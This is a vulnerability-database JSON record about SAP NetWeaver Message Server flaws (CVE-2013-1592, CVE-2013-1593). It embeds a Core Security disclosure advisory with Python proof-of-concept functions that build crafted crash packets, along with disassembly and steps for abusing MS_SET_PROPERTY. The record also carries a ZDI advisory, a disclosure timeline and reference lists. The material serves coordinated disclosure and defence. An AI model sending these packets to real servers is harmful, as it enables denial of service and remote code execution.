esi\n.text:00404DBB                 mov     edx,\nms_changeable_parameter.test[esi+esi]\n.text:00404DC2                 add     esi, esi\n.text:00404DC4                 push    edi\n.text:00404DC5                 push    pname\n.text:00404DC6                 call    edx              ; call our\noverwritten function pointer\n\n-----/\n\u0027MS_SET_PROPERTY\u0027 packets will be ignored by the Message Server if the\nrequesting client does not have administrative privileges, so it is\nnecessary to gain administrative privileges as explained above before\nusing the memory corruption vulnerability to overwrite one of the\nfunction pointers in the \u0027ms_changeable_parameter\u0027 global array. \n\n\n8.1.2. *Modify the configuration and behavior of the server*\n\nAfter gaining administrative privileges for our connections, it is\npossible to perform \u0027MS_SET_PROPERTY\u0027 packets against the Message Server\nin order to modify its configuration and behavior. That makes possible,\nfor example, to add virtual hosts to the load balancer, or to enable\nMonitor Mode [3] (transaction SMMS) on the affected server. Enabling\nMonitor Mode takes two steps:\n\n   1. Send a \u0027MS_SET_PROPERTY\u0027 packet with property \u0027name ==\n\"ms/monitor\"\u0027, property \u0027value == 1\u0027. \n   2. Send a \u0027MS_SET_PROPERTY\u0027 packet with property \u0027name ==\n\"ms/admin_port\"\u0027, property \u0027value == 3535\u0027 (or any other arbitrary port\nnumber). \nAfter sending the second \u0027MS_SET_PROPERTY\u0027 packet, the SAP Netweaver\nMessage Server will start listening on the specified port, waiting for\nconnections from instances of the msmon.exe monitoring program [4]. \n\nThe following python code can be used to trigger the vulnerability:\n\n/-----\ndef send_attack(connection):\n    print \"[*] Sending crash packet\"\n    crash = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n    crash+= \u0027\\x04\u0027 # version\n    crash+= \u0027\\x00\u0027 # errorno\n    crash+= server_name # toname\n    crash+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n    crash+= \u0027\\x04\\x0d\u0027 # flag/iflag\n    crash+= client_string # fromname\n    crash+= \u0027\\x00\\x00\u0027 # padd\n\n    crash+=\n\"ABCDEFGH\"+\"\\x01\\x00\\x00\\x00\"+\"MNOPQRSTUVWXYZ0123\"+\"\\x01\"+\"56789abcd\"\n    crash+= \"\\x00\\x00\\x00\\x01\"\n    crash+= \"\\xff\\xff\\xff\\xff\"\n    crash+= \"\\x00\\x00\\x00\\x00\"\n    send_packet(connection, crash)\n\n    print \"[*] Crash sent !\"\n-----/\n\n\n\n8.2. \nMalicious packets are processed by the vulnerable function \u0027WRITE_C\u0027 in\nthe \u0027msg_server.exe\u0027 module. \n\nThe following python code can be used to trigger the vulnerability:\n\n/-----\ndef send_attack(connection):\n    print \"[*] Sending crash packet\"\n    crash = \u0027**MESSAGE**\\x00\u0027 # eyecatcher\n    crash+= \u0027\\x04\u0027 # version\n    crash+= \u0027\\x00\u0027 # errorno\n    crash+= server_name # toname\n    crash+= \u0027\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\u0027 #\nmsgtype/reserved/key\n    crash+= \u0027\\x04\\x05\u0027 # flag/iflag\n    crash+= client_string # fromname\n    crash+= \u0027\\x00\\x00\u0027 # padd\n\n    crash+= \"AD-EYECATCH\\x00\"\n    crash+= \"\\x01\\x01\"\n    crash+= \"%11d\" % 104\n    crash+= \"%11d\" % 1\n    crash+= \"\\x15\\x00\\x00\\x00\"\n    crash+= \"\\x20\\x00\\x00\\xc8\"\n    crash+= \"LALA\" + \u0027 \u0027*(20-4)\n    crash+= \"LOLO\" + \u0027 \u0027*(40-4)\n    crash+= \" \"*36\n    send_packet(connection, crash)\n\n    print \"[*] Crash sent !\"\n\n-----/\n\n\n\n9. *Report Timeline*\n. 2012-12-10:\nCore Security Technologies notifies the SAP team of the vulnerability,\nsetting the estimated publication date of the advisory for January 22nd,\n2013. 2012-12-10:\nCore sends an advisory draft with technical details and a PoC. 2012-12-11:\nThe SAP team confirms the reception of the issue. 2012-12-21:\nSAP notifies that they concluded the analysis of the reported issues and\nconfirms two out of the five vulnerabilities. Vendor also notifies that\nthe other three reported issues were already fixed in February, 2012. \nVendor also notifies that the necessary code changes are being done and\nextensive tests will follow. The corresponding security note and patches\nare planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21:\nCore re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28:\nSAP notifies Core that they will be contacted if tests fails in order to\nre-schedule the advisory publication. 2013-01-22:\nFirst release date missed. 2013-01-28:\nSAP notifies that they are still confident with releasing a security\nnote and patches on Feb 12th as planned. 2013-01-29:\nCore acknowledges receiving the information and notifies that everything\nis ready for public disclosing on Feb 12th. Core also asks additional\ninformation regarding the patched vulnerabilities mentioned in\n[2012-12-21], including links to security bulletin, CVEs, and patches in\norder to verify if those patches effectively fix the reported flaws. 2013-02-01:\nSAP notifies that the patched vulnerabilities mentioned in [2012-12-21]\nwere reported in [5] and no CVE were assigned to them. Those\nvulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06:\nCore notifies that the patched vulnerabilities will be removed from the\nadvisory and asks additional information regarding the affected and\npatched version numbers. 2013-02-01:\nSAP notifies that the security note 1800603 will be released and that\nnote will provide further information regarting this vulnerability. 2013-02-13:\nAdvisory CORE-2012-1128 published. \n\n\n10. *References*\n\n[1] http://www.sap.com/platform/netweaver/index.epx. \n[2] SAP Security note Feb 2013\nhttps://service.sap.com/sap/support/notes/1800603. \n[3]\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm. \n\n[4]\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm. \n\n[5] SAP Security notes Feb 2012\nhttps//service.sap.com/sap/support/notes/1649840. \n[6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. \n[7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. \n[8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. \n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com. \n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations. \n\nCore Security\u0027s software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company\u0027s Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com. \n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2012 Core Security\nTechnologies and (c) 2012 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code\nExecution Vulnerability\nhttp://www.zerodayinitiative.com/advisories/ZDI-12-104\nJune 27, 2012\n\n- -- CVE ID:\n\n\n- -- CVSS:\n10, AV:N/AC:L/Au:N/C:C/I:C/A:C\n\n- -- Affected Vendors:\nSAP\n\n- -- Affected Products:\nSAP NetWeaver\n\n\n- -- TippingPoint(TM) IPS Customer Protection:\nTippingPoint IPS customers have been protected against this\nvulnerability by Digital Vaccine protection filter ID 12407. \n\n\n- -- Vendor Response:\nSAP has issued an update to correct this vulnerability. More details can be\nfound at:\nhttp://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1\n0-eea7-ceb666083a6a#section40\n\n\n- -- Disclosure Timeline:\n2011-10-28 - Vulnerability reported to vendor\n2012-06-27 - Coordinated public release of advisory\n\n\n- -- Credit:\nThis vulnerability was discovered by:\n* e6af8de8b1d4b2b6d5ba2610cbf9cd38\n\n\n- -- About the Zero Day Initiative (ZDI):\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \na best-of-breed model for rewarding security researchers for responsibly\ndisclosing discovered vulnerabilities. \n\nResearchers interested in getting paid for their security research\nthrough the ZDI can find more information and sign-up at:\n\n    http://www.zerodayinitiative.com\n\nThe ZDI is unique in how the acquired vulnerability information is\nused. Instead, upon notifying the affected product vendor,\nTippingPoint provides its customers with zero day protection through\nits intrusion prevention technology. Explicit details regarding the\nspecifics of the vulnerability are not exposed to any parties until\nan official vendor patch is publicly available. Furthermore, with the\naltruistic aim of helping to secure a broader user base, TippingPoint\nprovides this vulnerability information confidentially to security\nvendors (including competitors) who have a vulnerability protection or\nmitigation product. \n\nOur vulnerability disclosure policy is available online at:\n\n    http://www.zerodayinitiative.com/advisories/disclosure_policy/\n\nFollow the ZDI on Twitter:\n\n    http://twitter.com/thezdi\n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 10.2.0 (Build 1950)\nCharset: utf-8\n\nwsBVAwUBT+spXFVtgMGTo1scAQLsaAf7BDBhaaXu2xrm0nKo4KXmCuA091M40I4t\nuAkVEE7Zb4eFCtth3tsGSExGqDJp5LKfMe+KNfXUHMWcju+khxep8qfwxhnrtK2E\n1doQXQmrqCJunJLKwReEa5MpcZGsYyantq0kCczWf5ZYlzLEsSk51GEYfvHx7WrR\nXFTr4krClMcDxi9nOxNDr/CqqGxxQlDgBsMD3EyzVQ92PBG8kTZHUAJwBPqh7Ku3\nJqBWzVKDVVEsGxe7dlG4fXKIaDlCHaHJmsAr7+1Uw/DmfDOaTQMLRLvdGHY9Vpm6\nwGIQD/1eAW66eLSBOeWXiRNHcorXRwu/SxQP8zIESkmWLZwKfZqbMA==\n=t/ct\n-----END PGP SIGNATURE-----\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2013-1592"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007127"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-112"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433"
          },
          {
            "db": "BID",
            "id": "57956"
          },
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-1592"
          },
          {
            "db": "PACKETSTORM",
            "id": "120350"
          },
          {
            "db": "PACKETSTORM",
            "id": "114279"
          }
        ],
        "trust": 5.49
      },
      "exploit_availability": {
        "_id": null,
        "data": [
          {
            "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=24511",
            "trust": 0.1,
            "type": "exploit"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2013-1592"
          }
        ]
      },
      "external_ids": {
        "_id": null,
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2013-1592",
            "trust": 2.9
          },
          {
            "db": "BID",
            "id": "57956",
            "trust": 2.0
          },
          {
            "db": "SECTRACK",
            "id": "1028148",
            "trust": 1.7
          },
          {
            "db": "EXPLOIT-DB",
            "id": "24511",
            "trust": 1.7
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104",
            "trust": 0.9
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433",
            "trust": 0.8
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-112",
            "trust": 0.8
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007127",
            "trust": 0.8
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-1396",
            "trust": 0.7
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-1394",
            "trust": 0.7
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-1395",
            "trust": 0.7
          },
          {
            "db": "BID",
            "id": "54229",
            "trust": 0.6
          },
          {
            "db": "BID",
            "id": "54231",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201302-367",
            "trust": 0.6
          },
          {
            "db": "IVD",
            "id": "29348194-1F62-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          },
          {
            "db": "IVD",
            "id": "29FDB3DE-1F62-11E6-ABEF-000C29C66E3D",
            "trust": 0.2
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-1592",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "120350",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "114279",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-112"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-1592"
          },
          {
            "db": "BID",
            "id": "57956"
          },
          {
            "db": "PACKETSTORM",
            "id": "120350"
          },
          {
            "db": "PACKETSTORM",
            "id": "114279"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201302-367"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007127"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-1592"
          }
        ]
      },
      "id": "VAR-202001-0832",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433"
          }
        ],
        "trust": 1.87111164
      },
      "iot_taxonomy": {
        "_id": null,
        "data": [
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 1.6
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433"
          }
        ]
      },
      "last_update_date": "2026-04-10T23:58:28.008000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "SAP has issued an update to correct this vulnerability.",
            "trust": 1.4,
            "url": "https://websmp230.sap-ag.de/sap(bD1lbiZjPTAwMQ==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
          },
          {
            "title": "top page",
            "trust": 0.8,
            "url": "https://www.sap.com/japan/index.html"
          },
          {
            "title": "SAP has issued an update to correct this vulnerability.",
            "trust": 0.7,
            "url": "https://websmp230.sap-ag.de/sap(bD1lbiZjPTAwMQ==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
          },
          {
            "title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 parameter name patch for remote code execution vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/18435"
          },
          {
            "title": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 patch for buffer overflow vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/18434"
          },
          {
            "title": "martingalloar",
            "trust": 0.1,
            "url": "https://github.com/martingalloar/martingalloar "
          },
          {
            "title": "publications",
            "trust": 0.1,
            "url": "https://github.com/martingalloar/publications "
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-12-112"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-1592"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007127"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-120",
            "trust": 1.0
          },
          {
            "problemtype": "Classic buffer overflow (CWE-120) [NVD Evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007127"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-1592"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 2.6,
            "url": "http://www.coresecurity.com/content/sap-netweaver-msg-srv-multiple-vulnerabilities"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/57956"
          },
          {
            "trust": 1.7,
            "url": "https://packetstormsecurity.com/files/cve/cve-2013-1592"
          },
          {
            "trust": 1.7,
            "url": "http://www.exploit-db.com/exploits/24511"
          },
          {
            "trust": 1.7,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/82064"
          },
          {
            "trust": 1.7,
            "url": "http://www.securitytracker.com/id/1028148"
          },
          {
            "trust": 1.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1592"
          },
          {
            "trust": 1.4,
            "url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649840"
          },
          {
            "trust": 0.7,
            "url": "https://websmp230.sap-ag.de/sap(bd1lbizjptawmq==)/bc/bsp/spn/sapnotes/index2.htm?numm=1649838"
          },
          {
            "trust": 0.6,
            "url": "http://seclists.org/bugtraq/2012/jun/186"
          },
          {
            "trust": 0.6,
            "url": "http://seclists.org/bugtraq/2012/jun/185"
          },
          {
            "trust": 0.3,
            "url": "http://www.sap.com/platform/netweaver/index.epx"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/120.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=28248"
          },
          {
            "trust": 0.1,
            "url": "https://www.exploit-db.com/exploits/24511/"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/martingalloar/martingalloar"
          },
          {
            "trust": 0.1,
            "url": "http://corelabs.coresecurity.com."
          },
          {
            "trust": 0.1,
            "url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
          },
          {
            "trust": 0.1,
            "url": "https://service.sap.com/sap/support/notes/1800603."
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1593"
          },
          {
            "trust": 0.1,
            "url": "http://corelabs.coresecurity.com/"
          },
          {
            "trust": 0.1,
            "url": "http://www.zerodayinitiative.com/advisories/zdi-12-104/."
          },
          {
            "trust": 0.1,
            "url": "http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm."
          },
          {
            "trust": 0.1,
            "url": "http://www.sap.com/platform/netweaver/index.epx."
          },
          {
            "trust": 0.1,
            "url": "http://www.coresecurity.com."
          },
          {
            "trust": 0.1,
            "url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
          },
          {
            "trust": 0.1,
            "url": "http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm."
          },
          {
            "trust": 0.1,
            "url": "http://www.zerodayinitiative.com/advisories/zdi-12-112/."
          },
          {
            "trust": 0.1,
            "url": "http://www.zerodayinitiative.com/advisories/zdi-12-111/."
          },
          {
            "trust": 0.1,
            "url": "http://www.zerodayinitiative.com/advisories/disclosure_policy/"
          },
          {
            "trust": 0.1,
            "url": "http://twitter.com/thezdi"
          },
          {
            "trust": 0.1,
            "url": "http://www.tippingpoint.com"
          },
          {
            "trust": 0.1,
            "url": "http://www.zerodayinitiative.com"
          },
          {
            "trust": 0.1,
            "url": "http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1"
          },
          {
            "trust": 0.1,
            "url": "http://www.zerodayinitiative.com/advisories/zdi-12-104"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-12-112"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111"
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433"
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-1592"
          },
          {
            "db": "BID",
            "id": "57956"
          },
          {
            "db": "PACKETSTORM",
            "id": "120350"
          },
          {
            "db": "PACKETSTORM",
            "id": "114279"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201302-367"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007127"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-1592"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-112",
            "ident": null
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-111",
            "ident": null
          },
          {
            "db": "ZDI",
            "id": "ZDI-12-104",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434",
            "ident": null
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3433",
            "ident": null
          },
          {
            "db": "VULMON",
            "id": "CVE-2013-1592",
            "ident": null
          },
          {
            "db": "BID",
            "id": "57956",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "120350",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "114279",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201302-367",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-007127",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2013-1592",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2012-07-02T00:00:00",
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2012-07-02T00:00:00",
            "db": "IVD",
            "id": "29fdb3de-1f62-11e6-abef-000c29c66e3d",
            "ident": null
          },
          {
            "date": "2012-06-28T00:00:00",
            "db": "ZDI",
            "id": "ZDI-12-112",
            "ident": null
          },
          {
            "date": "2012-06-28T00:00:00",
            "db": "ZDI",
            "id": "ZDI-12-111",
            "ident": null
          },
          {
            "date": "2012-06-27T00:00:00",
            "db": "ZDI",
            "id": "ZDI-12-104",
            "ident": null
          },
          {
            "date": "2012-07-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2012-3434",
            "ident": null
          },
          {
            "date": "2012-07-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2012-3433",
            "ident": null
          },
          {
            "date": "2020-01-23T00:00:00",
            "db": "VULMON",
            "id": "CVE-2013-1592",
            "ident": null
          },
          {
            "date": "2013-02-13T00:00:00",
            "db": "BID",
            "id": "57956",
            "ident": null
          },
          {
            "date": "2013-02-15T23:44:44",
            "db": "PACKETSTORM",
            "id": "120350",
            "ident": null
          },
          {
            "date": "2012-06-28T03:51:55",
            "db": "PACKETSTORM",
            "id": "114279",
            "ident": null
          },
          {
            "date": "2013-02-22T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201302-367",
            "ident": null
          },
          {
            "date": "2020-02-14T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-007127",
            "ident": null
          },
          {
            "date": "2020-01-23T19:15:11.327000",
            "db": "NVD",
            "id": "CVE-2013-1592",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2012-06-28T00:00:00",
            "db": "ZDI",
            "id": "ZDI-12-112",
            "ident": null
          },
          {
            "date": "2012-06-28T00:00:00",
            "db": "ZDI",
            "id": "ZDI-12-111",
            "ident": null
          },
          {
            "date": "2012-06-27T00:00:00",
            "db": "ZDI",
            "id": "ZDI-12-104",
            "ident": null
          },
          {
            "date": "2012-07-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2012-3434",
            "ident": null
          },
          {
            "date": "2012-07-02T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2012-3433",
            "ident": null
          },
          {
            "date": "2020-01-31T00:00:00",
            "db": "VULMON",
            "id": "CVE-2013-1592",
            "ident": null
          },
          {
            "date": "2013-06-12T18:46:00",
            "db": "BID",
            "id": "57956",
            "ident": null
          },
          {
            "date": "2020-05-26T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201302-367",
            "ident": null
          },
          {
            "date": "2020-02-14T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-007127",
            "ident": null
          },
          {
            "date": "2020-01-31T17:08:36.590000",
            "db": "NVD",
            "id": "CVE-2013-1592",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "120350"
          },
          {
            "db": "PACKETSTORM",
            "id": "114279"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201302-367"
          }
        ],
        "trust": 0.8
      },
      "title": {
        "_id": null,
        "data": "SAP Netweaver ABAP \u0027msg_server.exe\u0027 Parameter name remote code execution vulnerability",
        "sources": [
          {
            "db": "IVD",
            "id": "29348194-1f62-11e6-abef-000c29c66e3d"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2012-3434"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201302-367"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202001-0833

    Vulnerability from variot - Updated: 2026-04-10 23:58

    A Denial of Service vulnerability exists in the WRITE_C function in the msg_server.exe module in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04 when sending a crafted SAP Message Server packet to TCP ports 36NN and/or 39NN. SAP NetWeaver Contains an array index validation vulnerability.Denial of service operation (DoS) May be in a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. The following products are affected: SAP Netweaver 2004s SAP Netweaver 7.01 SR1 SAP Netweaver 7.02 SP06 SAP Netweaver 7.30 SP04. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/

    CORE-2012-1128

    1. Advisory Information

    Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date of last update: 2013-02-13 Vendors contacted: SAP Release mode: Coordinated release

    1. Vulnerability Information

    Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1592, CVE-2013-1593

    1. By sending different messages, the different vulnerabilities can be triggered.

    2. Vulnerable packages

    . Older versions are probably affected too, but they were not checked.

    1. Non-vulnerable packages

    . Vendor did not provide this information.

    1. Vendor Information, Solutions and Workarounds

    SAP released the security note 1800603 [2] regarding these issues.

    1. Credits

    Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team.

    1. Technical Description / Proof of Concept Code

    The following python script is the main PoC that can be used to reproduce all vulnerabilities described below:

    /----- import socket, struct from optparse import OptionParser

    Parse the target options

    parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900) (options, args) = parser.parse_args()

    client_string = '-'+' '39 server_name = '-'+' '39

